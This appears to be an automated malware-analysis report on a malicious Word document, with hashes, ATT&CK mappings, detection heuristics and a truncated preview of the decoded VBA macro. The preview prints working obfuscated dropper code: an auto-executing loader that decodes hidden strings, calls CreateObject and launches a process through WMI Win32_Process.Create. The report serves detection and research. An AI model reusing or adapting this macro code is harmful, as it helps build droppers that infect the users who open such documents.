Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3ce0d9956b3bb9a2…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 252.5 KB
Created: 2019-11-01 14:23:00
Authoring application: Microsoft Office Word
First seen: 2019-12-10
MD5: f26bbd97d3ef630c0b3d0591bbad287b
SHA-1: 715a195e6c2ab67d6fc8a70386e4930cad0bb362
SHA-256: 3ce0d9956b3bb9a2fd83c98b261c88a3fa073b3d057cdb320ec3f0656f359bc6
Risk score: 282

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1059 Command and Scripting Interpreter

The sample is a malicious Office document containing obfuscated VBA macros. The macros use CreateObject and Shell calls, indicating an intent to download and execute a second-stage payload. The presence of an AutoOpen macro and the ClamAV detection further support the malicious verdict.

Heuristics (8)

  • ClamAV: Doc.Dropper.Generic-7369685-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Generic-7369685-0
  • VBA macros detected [medium, 4 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source as written, so string-based scanners miss them.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro present
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call present
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body; this is the standard Office DrawingML schema namespace, not an attacker-controlled address)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 25461 bytes
SHA-256: cfa0630b808fbc4b0a4e655dc2febeae413bcfb643f46bcfd5c4f2ae3a57ae76

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Tvbudqkxtvvwo"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Aaczuckyirufj, 0, 0, MSForms, TextBox"
Attribute VB_Control = "Fhlxnzqapp, 1, 1, MSForms, TextBox"
Attribute VB_Control = "Qdkbfetcg, 2, 2, MSForms, TextBox"
Attribute VB_Control = "Iriryzdbuqoib, 3, 3, MSForms, TextBox"
Attribute VB_Control = "Rkojsmhqsnk, 4, 4, MSForms, TextBox"
Attribute VB_Control = "Knyniegflo, 5, 5, MSForms, TextBox"
Attribute VB_Control = "Aydhpwljj, 6, 6, MSForms, TextBox"

Attribute VB_Name = "Nmzptvsq"
Function Movsnfzjjt()
On Error Resume Next
   Dim yYfxi()
ReDim yYfxi(2)
yYfxi(0) = 721
yYfxi(1) = 9
Dim QtHmNxFA, ktDZKFH, xHPGsNB
Dim ZWvcQEJDU, xdrPOAE
Dim GUFGK, PdtrW
   Dim HaXTHNCFd, GdwZnAgJ
Dim gEndHHDGG
Dim hslMD()
ReDim hslMD(3)
hslMD(0) = 2321
hslMD(1) = 3781
hslMD(2) = 8691
Dim YnJSgQH
Dim Qdmgvxqv()
   Dim aCBxHV()
ReDim aCBxHV(3)
aCBxHV(0) = 81
aCBxHV(1) = 91891
aCBxHV(2) = 147
Dim PqvGX()
ReDim PqvGX(2)
PqvGX(0) = 81
PqvGX(1) = 6
Dim XgWSNA()
ReDim XgWSNA(2)
XgWSNA(0) = 51
XgWSNA(1) = 98
Dim cilEA()
ReDim cilEA(3)
cilEA(0) = 6321
cilEA(1) = 71
cilEA(2) = 5364
ReDim Qdmgvxqv(3)
   Dim wzjDDAq
Dim BPZwE()
ReDim BPZwE(2)
BPZwE(0) = 81
BPZwE(1) = 2
Dim GymJCtBG, zmRIJE
Dim nTGEHB()
ReDim nTGEHB(2)
nTGEHB(0) = 14481
nTGEHB(1) = 7
Qdmgvxqv(0) = "owqjowqjwowqjowqjiowqjowqjnmowqjowqjgmtowqjowqjs:Wowqjowqjiowqj"
   Dim wnYyyCC()
ReDim wnYyyCC(2)
wnYyyCC(0) = 41
wnYyyCC(1) = 8
Dim PeJnF
Dim KWykXE()
ReDim KWykXE(2)
KWykXE(0) = 71
KWykXE(1) = 9
Dim xCiqA()
ReDim xCiqA(2)
xCiqA(0) = 21
xCiqA(1) = 6269
Qdmgvxqv(30 / 30) = "owqjnowqjowqj32owqj_owqjowqjProwqjowqjocowqjowqjowqjesowqjowqjsowqjowqj"
   Dim VjBuCGe
Dim jFrLB, bBNSG
Dim huGLubV()
ReDim huGLubV(2)
huGLubV(0) = 41
huGLubV(1) = 79
Dim zOMlDSQJF()
ReDim zOMlDSQJF(2)
zOMlDSQJF(0) = 9271
zOMlDSQJF(1) = 5050
Qdmgvxqv(1 + 1) = Tvbudqkxtvvwo.Fhlxnzqapp
   Dim YXIQAkB, yYbtNWj, cutFVxFDH
Dim QqxVJIBFC()
ReDim QqxVJIBFC(3)
QqxVJIBFC(0) = 51
QqxVJIBFC(1) = 161
QqxVJIBFC(2) = 4
Dim oIsxJECD()
ReDim oIsxJECD(2)
oIsxJECD(0) = 6431
oIsxJECD(1) = 3
Dim nPQrlGDhJ()
ReDim nPQrlGDhJ(3)
nPQrlGDhJ(0) = 81
nPQrlGDhJ(1) = 31
nPQrlGDhJ(2) = 59
Qdmgvxqv(15 / 5) = Cocqjzvsip(Cocqjzvsip(Cocqjzvsip(Tvbudqkxtvvwo.Iriryzdbuqoib + Tvbudqkxtvvwo.Knyniegflo)))
   Dim xsylJ, HERQcDE, CkTkEdH
Dim YpkUDAP, TxHUPA, AqkDH
Dim mhIeBFEz, fHBulzFI, SaRppHM
Dim BwzLxF()
ReDim BwzLxF(3)
BwzLxF(0) = 4681
BwzLxF(1) = 91
BwzLxF(2) = 94
Set Ypykihycnsm = CreateObject(Cocqjzvsip(Cocqjzvsip(Cocqjzvsip(Qdmgvxqv(1 + 1)))))
   Dim obTfGZCw()
ReDim obTfGZCw(3)
obTfGZCw(0) = 71
obTfGZCw(1) = 9961
obTfGZCw(2) = 589
Dim FLwXD()
ReDim FLwXD(2)
FLwXD(0) = 31
FLwXD(1) = 110
Dim bjpKB()
ReDim bjpKB(3)
bjpKB(0) = 2441
bjpKB(1) = 1071
bjpKB(2) = 9
Dim zmXOElc()
ReDim zmXOElc(2)
zmXOElc(0) = 71
zmXOElc(1) = 7
   Dim mAhdBUjB()
ReDim mAhdBUjB(2)
mAhdBUjB(0) = 41
mAhdBUjB(1) = 36
Dim PPFDDBJpw
Dim jycmMElM, wdVdiM, kpyAE
Dim ARQvEBSzE()
ReDim ARQvEBSzE(3)
ARQvEBSzE(0) = 81
ARQvEBSzE(1) = 3061
ARQvEBSzE(2) = 7
Set Iebnnwzcuvov = CreateObject(Cocqjzvsip(Cocqjzvsip(Cocqjzvsip(Qdmgvxqv(0) + Qdmgvxqv(30 / 30)))))
   Dim xgQwuJ()
ReDim xgQwuJ(3)
xgQwuJ(0) = 71
xgQwuJ(1) = 31
xgQwuJ(2) = 116
Dim cylBiAt()
ReDim cylBiAt(2)
cylBiAt(0) = 63081
cylBiAt(1) = 6
Dim OQFDGF()
ReDim OQFDGF(2)
OQFDGF(0) = 601
OQFDGF(1) = 81
Dim WlPHAIL, YlcTZC
Ypykihycnsm.ShowWindow = True And False
   Dim rlxHTy()
ReDim rlxHTy(2)
rlxHTy(0) = 1521
rlxHTy(1) = 7
Dim uotUI, oZlgFh, XPHrw
Dim zjsmBYGv()
ReDim zjsmBYGv(3)
zjsmBYGv(0) = 161
zjsmBYGv(1) = 111
zjsmBYGv(2) = 328
Dim IZAunOEb, ycMcCIT
Tbwrumyimnvw = Iebnnwzcuvov.Create(Qdmgvxqv(15 / 5), Skqazmud, Ypykihycnsm, Lxaqnnsiw)
   Dim vyLgDBqH()
ReDim vyLgDBqH(2)
vyLgDBqH(0) = 73541
vyLgDBqH(1) = 89
Dim CoyzgHGTO(
... (truncated)